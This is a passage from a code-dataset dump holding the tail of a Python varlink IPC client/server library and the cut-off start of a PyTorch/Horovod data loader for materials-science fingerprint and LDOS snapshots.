= iface.Monitor(initial_lines=1)\n >>> ret\n namespace(entries=[namespace(cursor='s=[…]',\n message=\"req:1 'dhcp4-change' [wlp3s0][…]\", priority='critical',\n process='nm-dispatcher', time='2018-01-29 12:19:59Z')])\n >>> ret.entries[0].process\n 'nm-dispatcher'\n\n Do varlink method call with varlink arguments and a\n multiple return values in monitor mode, using the \"_more\" keyword:\n >>> for m in iface.Monitor(_more=True):\n >>> for e in m.entries:\n >>> print(\"%s: %s\" % (e.time, e.message))\n 2018-01-29 12:19:59Z: [system] Activating via systemd: service name='[…]\n 2018-01-29 12:19:59Z: Starting Network Manager Script Dispatcher Service...\n 2018-01-29 12:19:59Z: bound to 10.200.159.150 -- renewal in 1423 seconds.\n 2018-01-29 12:19:59Z: [system] Successfully activated service 'org.freedesktop.nm_dispatcher'\n 2018-01-29 12:19:59Z: Started Network Manager Script Dispatcher Service.\n 2018-01-29 12:19:59Z: req:1 'dhcp4-change' [wlp3s0]: new request (6 scripts)\n 2018-01-29 12:19:59Z: req:1 'dhcp4-change' [wlp3s0]: start running ordered scripts...\n\n \"_more\" is special to this python varlink binding. 
If \"_more=True\", then the method call does\n not return a normal namespace wrapped varlink return value, but a generator,\n which yields the return values and waits (blocks) for the service to return more return values\n in the generator's .__next__() call.\n \"\"\"\n def __init__(self, address=None, resolve_interface=None, resolver=None):\n \"\"\"Get the interface descriptions from a varlink service.\n\n Keyword arguments:\n address -- the exact address like \"unix:/run/org.varlink.resolver\"\n resolve_interface -- an interface name, which is resolved with the system wide resolver\n resolver -- the exact address of the resolver to be used to resolve the interface name\n\n Exceptions:\n ConnectionError - could not connect to the service or resolver\n \"\"\"\n self._interfaces = {}\n self._childpid = 0\n def _resolve_interface(interface, resolver):\n _iface = Client(resolver).open('org.varlink.resolver')\n _r = _iface.Resolve(interface)\n return _r['address']\n\n with open(os.path.join(os.path.dirname(__file__), 'org.varlink.service.varlink')) as f:\n interface = Interface(f.read())\n self.add_interface(interface)\n\n if address is None and not (resolve_interface is None):\n address = _resolve_interface(resolve_interface, resolver or \"unix:/run/org.varlink.resolver\")\n\n if address.startswith(\"unix:\"):\n address = address[5:]\n mode = address.rfind(';mode=')\n if mode != -1:\n address = address[:mode]\n if address[0] == '@':\n address = address.replace('@', '\\0', 1)\n elif address.startswith(\"exec:\"):\n executable = address[5:]\n s = socket.socket(socket.AF_UNIX)\n s.setblocking(0)\n s.bind(\"\")\n s.listen()\n address = s.getsockname().decode('ascii')\n\n self._childpid = os.fork()\n if self._childpid == 0:\n # child\n n = s.fileno()\n if n == 3:\n # without dup() the socket is closed with the python destructor\n n = os.dup(3)\n del s\n else:\n try:\n os.close(3)\n except OSError:\n pass\n\n os.dup2(n, 3)\n address = address.replace('\\0', '@', 1)\n address = \"unix:%s;mode=0600\" % address\n os.execlp(executable, executable, address)\n sys.exit(1)\n # parent\n s.close()\n else:\n # FIXME: also accept other transports\n raise ConnectionError\n\n self._childpid\n self.address = address\n siface = self.open(\"org.varlink.service\")\n info = siface.GetInfo()\n\n for iface in info['interfaces']:\n desc = siface.GetInterfaceDescription(iface)\n interface = Interface(desc['description'])\n self._interfaces[interface._name] = interface\n\n def __del__(self):\n if hasattr(self, '_childpid') and self._childpid != 0:\n try:\n os.kill(self._childpid, signal.SIGTERM)\n except OSError:\n pass\n os.waitpid(self._childpid, 0)\n\n def open(self, interface_name, namespaced = False):\n \"\"\"Open a new connection and get a client interface handle with the varlink methods installed.\n\n Arguments:\n interface_name -- an interface name, which the service this client object is\n connected to, provides.\n\n Exceptions:\n InterfaceNotFound -- if the interface is not found\n ConnectionError -- could not connect to the service\n \"\"\"\n\n if not interface_name in self._interfaces:\n raise InterfaceNotFound(interface_name)\n\n try:\n s = socket.socket(socket.AF_UNIX)\n s.setblocking(1)\n s.connect(self.address)\n except:\n raise ConnectionError\n\n return ClientInterfaceProxy(self._interfaces[interface_name], s, namespaced = namespaced)\n\n def get_interfaces(self):\n \"\"\"Returns the a list of Interface objects the service implements.\"\"\"\n return self._interfaces\n\n def add_interface(self, 
interface):\n \"\"\"Manually add or overwrite an interface definition from an Interface object.\n\n Argument:\n interface - an Interface() object\n \"\"\"\n if not isinstance(interface, Interface):\n raise TypeError\n\n self._interfaces[interface._name] = interface\n\nclass Service:\n \"\"\"Varlink service server handler\n\n To use the Service, a global object is instantiated:\n service = varlink.Service(\n vendor='Red Hat',\n product='Manage System Accounts',\n version='1',\n interface_dir=os.path.dirname(__file__)\n )\n\n\n For the class implementing the methods of a specific varlink interface\n a decorator is used:\n @service.interface('com.redhat.system.accounts')\n class Accounts:\n […]\n\n The varlink file corresponding to this interface is loaded from the 'interface_dir'\n specified in the constructor of the Service. It has to end in '.varlink'.\n\n Split the incoming stream for every null byte and feed it to the service.handle()\n function. Write any message returned from this generator function to the output stream.\n for outgoing_message in service.handle(incoming_message):\n connection.write(outgoing_message)\n\n or see, how the SimpleServer handles the Service object:\n SimpleServer(service).serve(sys.argv[1], listen_fd=listen_fd)\n\n Note: varlink only handles one method call at a time on one connection.\n\n \"\"\"\n def __init__(self, vendor='', product='', version='', interface_dir='.', namespaced=False):\n \"\"\"Initialize the service with the data org.varlink.service.GetInfo() returns\n\n Arguments:\n interface_dir -- the directory with the *.varlink files for the interfaces\n \"\"\"\n self.vendor = vendor\n self.product = product\n self.version = version\n self.interface_dir = interface_dir\n self._namespaced = namespaced\n\n self.url = None\n self.interfaces = {}\n directory = os.path.dirname(__file__)\n self._add_interface(os.path.join(directory, 'org.varlink.service.varlink'), self)\n\n def GetInfo(self):\n \"\"\"The standardized org.varlink.service.GetInfo() varlink method.\"\"\"\n return {\n 'vendor': self.vendor,\n 'product': self.product,\n 'version': self.version,\n 'url': self.url,\n 'interfaces': list(self.interfaces.keys())\n }\n\n def GetInterfaceDescription(self, interface):\n \"\"\"The standardized org.varlink.service.GetInterfaceDescription() varlink method.\"\"\"\n try:\n i = self.interfaces[interface]\n except KeyError:\n raise InterfaceNotFound(interface)\n\n return {'description': i._description}\n\n def _handle(self, message):\n try:\n interface_name, _, method_name = message.get('method', '').rpartition('.')\n if not interface_name or not method_name:\n raise InterfaceNotFound(interface_name)\n\n interface = self.interfaces.get(interface_name)\n if not interface:\n raise InterfaceNotFound(interface_name)\n\n method = interface.get_method(method_name)\n\n parameters = message.get('parameters', {})\n for name in parameters:\n if name not in method.in_type.fields:\n raise InvalidParameter(name)\n if self._namespaced:\n parameters[name] = json.loads(json.dumps(parameters[name]), object_hook=lambda d: SimpleNamespace(**d))\n\n func = getattr(interface._handler, method_name, None)\n if not func or not callable(func):\n raise MethodNotImplemented(method_name)\n\n\n kwargs = {}\n if message.get('more', False) or message.get('oneway', False) or message.get('upgrade', False):\n sig = signature(func)\n if message.get('more', False) and '_more' in sig.parameters:\n kwargs[\"_more\"] = True\n\n if message.get('oneway', False) and '_oneway' in sig.parameters:\n 
kwargs[\"_oneway\"] = True\n\n if message.get('upgrade', False) and '_upgrade' in sig.parameters:\n kwargs[\"_upgrade\"] = True\n\n out = func(**parameters, **kwargs)\n\n if isinstance(out, GeneratorType):\n try:\n for o in out:\n if isinstance(o, Exception):\n raise o\n\n if kwargs.get(\"_oneway\", False):\n return\n\n cont = True\n if '_continues' in o:\n cont = o['_continues']\n del o['_continues']\n yield { 'continues': bool(cont), 'parameters': o or {}}\n else:\n yield { 'parameters': o or {}}\n\n if not cont:\n return\n except ConnectionError as e:\n out.throw(e)\n else:\n yield {'parameters': out or {}}\n\n except VarlinkError as error:\n return error\n except Exception as error:\n traceback.print_exception(type(error), error, error.__traceback__)\n return {'error': 'InternalError'}\n\n def handle(self, message):\n \"\"\"This generator function handles any incoming message. Write any returned bytes to the output stream.\n\n for outgoing_message in service.handle(incoming_message):\n connection.write(outgoing_message)\n \"\"\"\n if not message:\n return\n\n if message[-1] == 0:\n message = message[:-1]\n\n for out in self._handle(json.loads(message)):\n yield json.dumps(out, cls=VarlinkEncoder).encode('utf-8') + b'\\0'\n\n def _add_interface(self, filename, handler):\n if not os.path.isabs(filename):\n filename = os.path.join(self.interface_dir, filename + '.varlink')\n\n with open(filename) as f:\n interface = Interface(f.read())\n interface._handler = handler\n self.interfaces[interface._name] = interface\n\n def interface(self, filename):\n def decorator(interface_class):\n self._add_interface(filename, interface_class())\n return interface_class\n\n return decorator\n\nclass Interface:\n \"\"\"Class for a parsed varlink interface definition.\"\"\"\n def __init__(self, description):\n \"\"\"description -- description string in varlink interface definition language\"\"\"\n self._description = description\n\n scanner = Scanner(description)\n scanner.expect('interface')\n self._name = scanner.expect('interface-name')\n self._members = collections.OrderedDict()\n while not scanner.end():\n member = scanner.read_member()\n self._members[member.name] = member\n\n def get_description(self):\n \"\"\"return the description string in varlink interface definition language\"\"\"\n return self._description\n\n def get_method(self, name):\n method = self._members.get(name)\n if method and isinstance(method, _Method):\n return method\n raise MethodNotFound(name)\n\n def filter_params(self, vtype, args, kwargs):\n if isinstance(vtype, _CustomType):\n return self.filter_params(self._members.get(vtype.name), args, kwargs)\n\n if isinstance(vtype, _Alias):\n return self.filter_params(self._members.get(vtype.type), args, kwargs)\n\n if isinstance(vtype, _Array):\n return [self.filter_params(vtype.element_type, x, None) for x in args]\n\n if not isinstance(vtype, _Struct):\n return args\n\n out = {}\n\n mystruct = None\n if not isinstance(args, tuple):\n mystruct = args\n args = None\n\n for name in vtype.fields:\n if isinstance(args, tuple):\n if args:\n val = args[0]\n if len(args) > 1:\n args = args[1:]\n else:\n args = None\n out[name] = self.filter_params(vtype.fields[name], val, None)\n continue\n else:\n if name in kwargs:\n out[name] = self.filter_params(vtype.fields[name], kwargs[name], None)\n continue\n\n if mystruct:\n try:\n if isinstance(mystruct, dict):\n val = mystruct[name]\n else:\n val = getattr(mystruct, name)\n out[name] = self.filter_params(vtype.fields[name], val, None)\n 
except:\n pass\n\n return out\n\nclass Scanner:\n \"\"\"Class for scanning a varlink interface definition.\"\"\"\n def __init__(self, string):\n self.whitespace = re.compile(r'([ \\t\\n]|#.*$)+', re.ASCII | re.MULTILINE)\n # FIXME: nested ()\n self.method_signature = re.compile(r'([ \\t\\n]|#.*$)*(\\([^)]*\\))([ \\t\\n]|#.*$)*->([ \\t\\n]|#.*$)*(\\([^)]*\\))', re.ASCII | re.MULTILINE)\n\n self.keyword_pattern = re.compile(r'\\b[a-z]+\\b|[:,(){}]|->|\\[\\]', re.ASCII)\n self.patterns = {\n 'interface-name': re.compile(r'[a-z]+(\\.[a-z0-9][a-z0-9-]*)+'),\n 'member-name': re.compile(r'\\b[A-Z][A-Za-z0-9_]*\\b', re.ASCII),\n 'identifier': re.compile(r'\\b[A-Za-z0-9_]+\\b', re.ASCII),\n }\n\n self.string = string\n self.pos = 0\n\n def get(self, expected):\n m = self.whitespace.match(self.string, self.pos)\n if m:\n self.pos = m.end()\n\n pattern = self.patterns.get(expected)\n if pattern:\n m = pattern.match(self.string, self.pos)\n if m:\n self.pos = m.end()\n return m.group(0)\n else:\n m = self.keyword_pattern.match(self.string, self.pos)\n if m and m.group(0) == expected:\n self.pos = m.end()\n return True\n\n def expect(self, expected):\n value = self.get(expected)\n if not value:\n raise SyntaxError('expected {}'.format(expected))\n return value\n\n def end(self):\n m = self.whitespace.match(self.string, self.pos)\n if m:\n self.pos = m.end()\n\n return self.pos >= len(self.string)\n\n def read_type(self):\n if self.get('bool'):\n t = bool()\n elif self.get('int'):\n t = int()\n elif self.get('float'):\n t = float()\n elif self.get('string'):\n t = str()\n else:\n name = self.get('member-name')\n if name:\n t = _CustomType(name)\n else:\n t = self.read_struct()\n\n if self.get('[]'):\n t = _Array(t)\n\n return t\n\n def read_struct(self):\n self.expect('(')\n fields = collections.OrderedDict()\n if not self.get(')'):\n while True:\n name = self.expect('identifier')\n self.expect(':')\n fields[name] = self.read_type()\n if not self.get(','):\n break\n self.expect(')')\n\n return _Struct(fields)\n\n def read_member(self):\n if self.get('type'):\n return _Alias(self.expect('member-name'), self.read_type())\n elif self.get('method'):\n name = self.expect('member-name')\n # FIXME\n sig = self.method_signature.match(self.string, self.pos)\n if sig:\n sig = name + sig.group(0)\n in_type = self.read_struct()\n self.expect('->')\n out_type = self.read_struct()\n return _Method(name, in_type, out_type, sig)\n elif self.get('error'):\n return _Error(self.expect('member-name'), self.read_type())\n else:\n raise SyntaxError('expected type, method, or error')\n\nclass _Struct:\n def __init__(self, fields):\n self.fields = collections.OrderedDict(fields)\n\nclass _Array:\n def __init__(self, element_type):\n self.element_type = element_type\n\nclass _CustomType:\n def __init__(self, name):\n self.name = name\n\nclass _Alias:\n def __init__(self, name, varlink_type):\n self.name = name\n self.type = varlink_type\n\nclass _Method:\n def __init__(self, name, in_type, out_type, signature):\n self.name = name\n self.in_type = in_type\n self.out_type = out_type\n self.signature = signature\n\nclass _Error:\n def __init__(self, name, varlink_type):\n self.name = name\n self.type = varlink_type\n\nclass ClientInterfaceProxy:\n \"\"\"A varlink client for an interface doing send/write and receive/read on a socket or file stream\"\"\"\n def __init__(self, interface, file_or_socket, namespaced = False):\n \"\"\"Creates an object with the varlink methods of an interface installed.\n\n The object allows to talk to a 
varlink service, which implements the specified interface\n transparently by calling the methods. The call blocks until enough messages are received.\n\n For monitor calls with '_more=True' a generator object is returned.\n\n Arguments:\n interface - an Interface object\n file_or_socket - an open socket or io stream\n namespaced - if True, varlink methods return SimpleNamespace objects instead of dictionaries\n \"\"\"\n self._interface = interface\n self._connection = file_or_socket\n\n if hasattr(self._connection, 'sendall'):\n self._sendall = True\n else:\n if not hasattr(self._connection, 'write'):\n raise TypeError\n self._sendall = False\n\n if hasattr(self._connection, 'recv'):\n self._recv = True\n else:\n if not hasattr(self._connection, 'read'):\n raise TypeError\n self._recv = False\n\n self._in_use = False\n self._in_buffer = b''\n\n self._namespaced = namespaced\n\n for member in interface._members.values():\n if isinstance(member, _Method):\n self._add_method(member)\n\n def _add_method(self, method):\n def _wrapped(*args, **kwds):\n if \"_more\" in kwds and kwds.pop(\"_more\"):\n return self._call_more(method.name, *args, **kwds)\n else:\n return self._call(method.name, *args, **kwds)\n _wrapped.__name__ = method.name\n # FIXME: add comments\n _wrapped.__doc__ = \"Varlink call: \" + method.signature\n setattr(self, method.name, _wrapped)\n\n def _send(self, out):\n if self._sendall:\n self._connection.sendall(json.dumps(out, cls=VarlinkEncoder).encode('utf-8') + b'\\0')\n elif hasattr:\n self._connection.write(json.dumps(out, cls=VarlinkEncoder).encode('utf-8') + b'\\0')\n\n def _next(self):\n while True:\n message, _, self._in_buffer = self._in_buffer.partition(b'\\0')\n if message:\n return message\n\n if self._recv:\n data = self._connection.recv(8192)\n else:\n data = self._connection.read(8192)\n\n if len(data) == 0:\n raise ConnectionError\n self._in_buffer += data\n\n def _nextMessage(self):\n message = self._next()\n if self._namespaced:\n message = json.loads(message, object_hook=lambda d: SimpleNamespace(**d))\n if hasattr(message, \"error\"):\n raise VarlinkError(message, self._namespaced)\n else:\n return (message.parameters, hasattr(message, \"continues\") and message.continues)\n else:\n message = json.loads(message)\n if 'error' in message:\n raise VarlinkError(message, self._namespaced)\n else:\n return (message['parameters'], ('continues' in message) and message['continues'])\n\n\n def _call(self, method_name, *args, **kwargs):\n if self._in_use:\n raise ConnectionError\n\n method = self._interface.get_method(method_name)\n\n sparam = self._interface.filter_params(method.in_type, args, kwargs)\n out = {'method' : self._interface._name + \".\" + method_name, 'parameters' : sparam}\n self._send(out)\n\n self._in_use = True\n (ret, more) = self._nextMessage()\n if more:\n self._connection.close()\n self._in_use = False\n raise ConnectionError\n self._in_use = False\n return ret\n\n def _call_more(self, method_name, *args, **kwargs):\n if self._in_use:\n raise ConnectionError\n\n method = self._interface.get_method(method_name)\n\n sparam = self._interface.filter_params(method.in_type, args, kwargs)\n out = {'method' : self._interface._name + \".\" + method_name, 'more' : True, 'parameters' : sparam}\n self._send(out)\n\n more = True\n self._in_use = True\n while True:\n (ret, more) = self._nextMessage()\n yield ret\n if not more:\n break\n self._in_use = False\n\n# Used by the SimpleServer\nclass _Connection:\n def __init__(self, _socket):\n self._socket = 
_socket\n self._in_buffer = b''\n self._out_buffer = b''\n\n def close(self):\n self._socket.close()\n\n def events(self):\n events = 0\n if len(self._in_buffer) < (8 * 1024 * 1024):\n events |= select.EPOLLIN\n if self._out_buffer:\n events |= select.EPOLLOUT\n return events\n\n def dispatch(self, events):\n if events & select.EPOLLOUT:\n n = self._socket.send(self._out_buffer[:8192])\n self._out_buffer = self._out_buffer[n:]\n\n if events & select.EPOLLIN:\n data = self._socket.recv(8192)\n if len(data) == 0:\n raise ConnectionError\n self._in_buffer += data\n\n def read(self):\n while True:\n message, _, self._in_buffer = self._in_buffer.partition(b'\\0')\n if message:\n yield message\n else:\n break\n\n def write(self, message):\n self._out_buffer += message\n\nclass SimpleServer:\n \"\"\"A simple single threaded unix domain socket server\n\n calls service.handle(message) for every zero byte separated incoming message\n and writes any return message from this generator function to the outgoing stream.\n\n Better use a framework like twisted to serve.\n \"\"\"\n def __init__(self, service):\n self._service = service\n self.connections = {}\n self._more = {}\n\n def serve(self, address, listen_fd=None):\n if listen_fd:\n s = socket.fromfd(listen_fd, socket.AF_UNIX, socket.SOCK_STREAM)\n else:\n if address[0] == '@':\n address = address.replace('@', '\\0', 1)\n\n s = socket.socket(socket.AF_UNIX)\n s.setblocking(0)\n s.bind(address)\n s.listen()\n\n epoll = select.epoll()\n epoll.register(s, select.EPOLLIN)\n\n while True:\n for fd, events in epoll.poll():\n if fd == s.fileno():\n sock, _ = s.accept()\n sock.setblocking(0)\n connection = _Connection(sock)\n self.connections[sock.fileno()] = connection\n epoll.register(sock.fileno(), select.EPOLLIN)\n else:\n connection = self.connections.get(fd)\n try:\n connection.dispatch(events)\n\n if not fd in self._more:\n for message in connection.read():\n # Let the varlink service handle this\n it = iter(self._service.handle(message))\n if isinstance(it, GeneratorType):\n self._more[fd] = it\n else:\n raise TypeError\n\n if fd in self._more:\n try:\n reply = next(self._more[fd])\n if reply != None:\n # write any reply pending\n connection.write(reply)\n except StopIteration:\n del self._more[fd]\n except ConnectionError as e:\n epoll.unregister(fd)\n connection.close()\n if fd in self._more:\n try:\n self._more[fd].throw(ConnectionError())\n except StopIteration:\n pass\n del self._more[fd]\n continue\n except Exception as error:\n traceback.print_exception(type(error), error, error.__traceback__)\n sys.exit(1)\n\n epoll.modify(fd, connection.events())\n\n s.close()\n epoll.close()\n\n","sub_path":"varlink/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":30607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"42569245","text":"# FP LDOS, Data Loaders\n\nimport os, sys\nimport numpy as np\n#import torch.nn as nn\n#import torch.nn.functional as F\n\n#import torch.utils.Dataset\nimport torch.utils.data.distributed\nimport torch.utils.data\nimport torch.utils\nimport horovod.torch as hvd\n\n#sys.path.append(\"./charm/\")\n#import charm.big_data\n\n###-----------------------------------------------------------------------###\n\n# Big Data Dataset\n#class Big_Dataset(torch.utils.data.Dataset):\n#\n# def __init__(self, args, data_name):\n#\n# fp_data_paths = []\n# ldos_data_paths = []\n#\n# if (data_name == \"train\"):\n# if (hvd.rank() == 0):\n# print(\"Creating Big Data 
Train Dataset\")\n#\n# # Start at snapshot 0\n# self.num_snapshots = args.num_snapshots - 2\n# snapshot = 0\n#\n# elif (data_name == \"validation\"):\n# if (hvd.rank() == 0):\n# print(\"Creating Big Data Validation Dataset\")\n#\n# # 2nd to last snapshot in the set of num_snapshots\n# self.num_snapshots = 1\n# snapshot = args.num_snapshots - 2\n#\n# elif (data_name == \"test\"):\n# if (hvd.rank() == 0):\n# print(\"Creating Big Data Test Dataset\")\n#\n# # Last snapshot in the set of num_snapshots\n# self.num_snapshots = 1\n# snapshot = args.num_snapshots - 1\n# else:\n# if (hvd.rank() == 0):\n# print(\"\\nInvalid Big Datset. Options are ['train', 'validation', or 'test'].\\n\\n\")\n# exit(0);\n#\n# fp_head = \"/%s/%sgcc/%s_fp_%dx%dx%dgrid_%dcomps\" % \\\n# (args.temp, args.gcc, args.material, \\\n# args.nxyz, args.nxyz, args.nxyz, args.fp_length)\n# ldos_head = \"/%s/%sgcc/%s_ldos_%dx%dx%dgrid_%delvls\" % \\\n# (args.temp, args.gcc, args.material, \\\n# args.nxyz, args.nxyz, args.nxyz, args.ldos_length)\n#\n#\n#\n# for i in range(self.num_snapshots):\n# fp_data_paths.append(args.fp_dir + fp_head + \\\n# \"_snapshot%d.npy\" % (snapshot + i))\n# ldos_data_paths.append(args.ldos_dir + ldos_head + \\\n# \"_snapshot%d.npy\" % (snapshot + i))\n# \n# # List of numpy arrays to preserve mmap_mode\n# self.fp_dataset = [] \n# self.ldos_dataset = []\n#\n# # Load Datasets\n# for idx, path in enumerate(fp_data_paths):\n# self.fp_dataset.append(np.load(path, mmap_mode=\"r\"))\n# for idx, path in enumerate(ldos_data_paths):\n# self.ldos_dataset.append(np.load(path, mmap_mode=\"r\"))\n#\n# # FP subset and reshape\n# fp_idxs = subset_fp(args)\n# for i in range(len(self.fp_dataset)):\n# self.fp_dataset[i] = self.fp_dataset[i][:,:,:,fp_idxs]\n#\n# data_shape = self.fp_dataset[i].shape \n#\n# grid_pts = data_shape[0] * data_shape[1] * data_shape[2]\n#\n# self.fp_dataset[i] = np.reshape(self.fp_dataset[i], [grid_pts, data_shape[3]])\n#\n# self.fp_dataset[i] = self.fp_dataset[i]\n#\n# # !!! Need to modify !!! \n# # Switch args.fp_length -> args.fp_length and args.final_fp_length \n# if (data_name == \"test\"):\n# args.fp_length = data_shape[-1]\n#\n#\n# # LDOS subset and reshape\n# ldos_idxs = subset_ldos(args)\n# for i in range(len(self.ldos_dataset)):\n# self.ldos_dataset[i] = self.ldos_dataset[i][:,:,:,ldos_idxs]\n#\n# data_shape = self.ldos_dataset[i].shape \n#\n# grid_pts = data_shape[0] * data_shape[1] * data_shape[2]\n#\n# self.ldos_dataset[i] = np.reshape(self.ldos_dataset[i], [grid_pts, data_shape[3]])\n# \n# self.ldos_dataset[i] = self.ldos_dataset[i]\n#\n# # !!! Need to modify !!! \n# # Switch args.ldos_length -> args.ldos_length and args.final_ldos_length \n# if (data_name == \"test\"):\n# args.ldos_length = data_shape[-1]\n# args.grid_pts = grid_pts\n#\n# self.grid_pts = grid_pts\n#\n# # Consistency Checks\n# if (len(self.fp_dataset) != len(self.ldos_dataset)):\n# if (hvd.rank() == 0):\n# print(\"\\nError. Num snapshots for fp and ldos inconsistent.\\n\\n\")\n# exit(0);\n#\n# for i in range(len(self.fp_dataset)):\n# if (self.fp_dataset[i].shape[0] != self.ldos_dataset[i].shape[0]):\n# if (hvd.rank() == 0):\n# print(\"\\nError. Snapshot %d, FP and LDOS dataset have different number of data points.\\n\\n\" % i)\n# exit(0);\n#\n# if (self.fp_dataset[0].shape[-1] != self.fp_dataset[i].shape[-1]):\n# if (hvd.rank() == 0):\n# print(\"\\nError. 
Snapshot %d, Fingerprint lengths are not consistent between snapshots.\\n\\n\" % i)\n# exit(0);\n# \n# if (self.ldos_dataset[0].shape[-1] != self.ldos_dataset[i].shape[-1]):\n# if (hvd.rank() == 0):\n# print(\"\\nError. Snapshot %d, LDOS lengths are not consistent between snapshots.\\n\\n\" % i)\n# exit(0);\n#\n#\n#\n# # Fetch a sample\n# def __getitem__(self, idx):\n# \n## print(\"idx: \", idx)\n#\n# return torch.tensor(self.fp_dataset[idx // self.grid_pts][idx % self.grid_pts, :]).float(), \\\n# torch.tensor(self.ldos_dataset[idx // self.grid_pts][idx % self.grid_pts, :]).float()\n#\n## print(\"input shape: \", t1.shape)\n## print(\"output shape: \", t2.shape)\n#\n#\n## return t1, t2\n#\n#\n# # Number of samples in dataset\n# def __len__(self):\n# return self.num_snapshots * self.grid_pts\n#\n\n###-----------------------------------------------------------------------###\n\n# Compressed Dataset\n#class Compressed_Dataset(torch.utils.data.Dataset):\n#\n# def __init__(self, args, data_name, fp_data, ldos_data):\n#\n# if (hvd.rank() == 0):\n# print(\"Creating Big Compressed Dataset:\")\n#\n# self.args = args\n# self.sample = 0\n# \n# if (args.load_encoder):\n# self.encoder = 0\n# else:\n#\n# args.fp_length = fp_data.shape[1]\n#\n# self.num_subdim = 2\n# self.ks = 256\n#\n# if (args.fp_length % self.num_subdim != 0):\n# print(\"\\n\\nPQKMeans division error. %d not a factor of %d. Exiting!\\n\" % (self.num_subdim, args.fp_length))\n# exit(0)\n#\n# self.pqkmeans.encoder.PQEncoder(num_subdim=self.num_subdim, Ks=self.ks\n#\n# sample_pts = fp_data.shape[0] * args.compress_fit_ratio\n#\n# if (hvd.rank() == 0):\n# print(\"Begin fitting encoder to subset of data\")\n# \n# tic = timeit.default_timer()\n# self.encoder.fit(fp_data[:sample_pts])\n# toc = timeit.default_timer()\n#\n# if (hvd.rank() == 0):\n# print(\"Fit %d samples to %s dataset encoder: %4.4fs\" % (sample_pts, data_name, toc - tic))\n# \n# tic\n#\n# fp_encode = encoder.transform(fp_data)\n# \n#\n# self\n#\n#\n#\n#\n# self.cluster_ids = []\n#\n# for i in range(args.clusters):\n# self.cluster_ids.append()\n#\n# \n#\n# def __getitem__(self, idx):\n#\n# \n#\n# return 0;\n#\n# def __len__(self):\n# return 1;\n\n\n\n\n###-----------------------------------------------------------------------###\n\n#\n# RANDOM Dataset\n#\n\ndef load_data_random(args):\n# args.fp_length = 116\n# args.ldos_length = 128\n# args.dens_length = 1\n# args.lstm_in_length = 10\n\n if (hvd.rank() == 0):\n print(\"Begin Load Data for RANDOM\")\n \n args.grid_pts = args.nxyz ** 3\n\n train_pts = int(args.grid_pts * args.train_test_split)\n validation_pts = int((args.grid_pts - train_pts) / 2.0)\n test_pts = args.grid_pts - train_pts - validation_pts\n\n\n ldos_random_torch = \\\n torch.tensor(np.random.rand(args.grid_pts, args.ldos_length), \\\n dtype=torch.float32)\n \n fp_random_torch = \\\n torch.tensor(np.random.rand(args.grid_pts, args.fp_length), \\\n dtype=torch.float32)\n\n fp_ldos_dataset = \\\n torch.utils.data.TensorDataset(fp_random_torch, ldos_random_torch)\n\n train_dataset, validation_dataset, test_dataset = \\\n torch.utils.data.random_split(fp_ldos_dataset, \\\n [train_pts, validation_pts, test_pts])\n\n return (train_dataset, validation_dataset, test_dataset)\n\n\n###-----------------------------------------------------------------------###\n\n#\n# FP_LDOS Dataset\n#\n\ndef load_data_fp_ldos(args):\n\n if (hvd.rank() == 0):\n print(\"Begin Load Data for FP_LDOS\")\n\n # Currently use \n # 1 snapshot for validation, \n # 1 snapshot for test, \n # and the 
rest for training.\n args.test_snapshot = args.num_snapshots - 1;\n args.validation_snapshot = args.num_snapshots - 2;\n args.num_train_snapshots = args.num_snapshots - 2;\n\n if (args.num_train_snapshots < 1):\n args.num_train_snapshots = 1\n if (args.validation_snapshot < 0):\n args.validation_snapshot = 0\n\n # If using water dataset\n if (args.water):\n args.fp_data_fpath = \"/%s/%sgcc/~~~~~~~~\" % (args.temp, args.gcc)\n args.ldos_data_fpath = \"/%s/%sgcc/~~~~~~~~\" % (args.temp, args.gcc)\n\n print(\"\\n\\nFor Josh, water case.\\n\\n\")\n exit(0);\n\n # If using Material (Al) dataset\n else:\n args.fp_data_fpath = \"/%s/%sgcc/%s_fp_%dx%dx%dgrid_%dcomps\" % \\\n (args.temp, args.gcc, args.material, args.nxyz, args.nxyz, args.nxyz, args.fp_length)\n args.ldos_data_fpath = \"/%s/%sgcc/%s_ldos_%dx%dx%dgrid_%delvls\" % \\\n (args.temp, args.gcc, args.material, args.nxyz, args.nxyz, args.nxyz, args.ldos_length)\n\n # Get dimensions of fp/ldos numpy arrays \n empty_fp_np = np.load(args.fp_dir + args.fp_data_fpath + \\\n \"_snapshot%d.npy\" % (0), mmap_mode='r')\n empty_ldos_np = np.load(args.ldos_dir + args.ldos_data_fpath + \\\n \"_snapshot%d.npy\" % (0), mmap_mode='r')\n\n fp_shape = empty_fp_np.shape\n ldos_shape = empty_ldos_np.shape\n\n # Create empty np arrays to store all train snapshots \n # (FP(input) and LDOS(output)) \n full_train_fp_np = \\\n np.empty(np.insert(fp_shape, 0, args.num_train_snapshots))\n full_train_ldos_np = \\\n np.empty(np.insert(ldos_shape, 0, args.num_train_snapshots))\n\n if (hvd.rank() == 0):\n print(\"Original Fingerprint shape: \", full_train_fp_np.shape)\n print(\"Original LDOS shape: \", full_train_ldos_np.shape)\n print(\"Reading Fingerprint and LDOS dataset\")\n\n hvd.allreduce(torch.tensor(0), name='barrier')\n \n for sshot in range(args.num_train_snapshots):\n print(\"Rank: %d, Reading train snapshot %d\" % (hvd.rank(), sshot))\n\n full_train_fp_np[sshot, :, :, :, :] = np.load(args.fp_dir + args.fp_data_fpath + \\\n \"_snapshot%d.npy\" % (sshot))\n\n full_train_ldos_np[sshot, :, :, :, :] = np.load(args.ldos_dir + args.ldos_data_fpath + \\\n \"_snapshot%d.npy\" % (sshot))\n\n hvd.allreduce(torch.tensor(0), name='barrier')\n \n print(\"Rank: %d, Reading validation snapshot %d\" % (hvd.rank(), args.validation_snapshot))\n validation_fp_np = np.load(args.fp_dir + args.fp_data_fpath + \\\n \"_snapshot%d.npy\" % (args.validation_snapshot))\n validation_ldos_np = np.load(args.ldos_dir + args.ldos_data_fpath + \\\n \"_snapshot%d.npy\" % (args.validation_snapshot))\n \n hvd.allreduce(torch.tensor(0), name='barrier')\n \n if (not args.no_testing):\n print(\"Rank: %d, Reading test snapshot %d\" % (hvd.rank(), args.test_snapshot))\n test_fp_np = np.load(args.fp_dir + args.fp_data_fpath + \\\n \"_snapshot%d.npy\" % (args.test_snapshot))\n test_ldos_np = np.load(args.ldos_dir + args.ldos_data_fpath + \\\n \"_snapshot%d.npy\" % (args.test_snapshot))\n else:\n 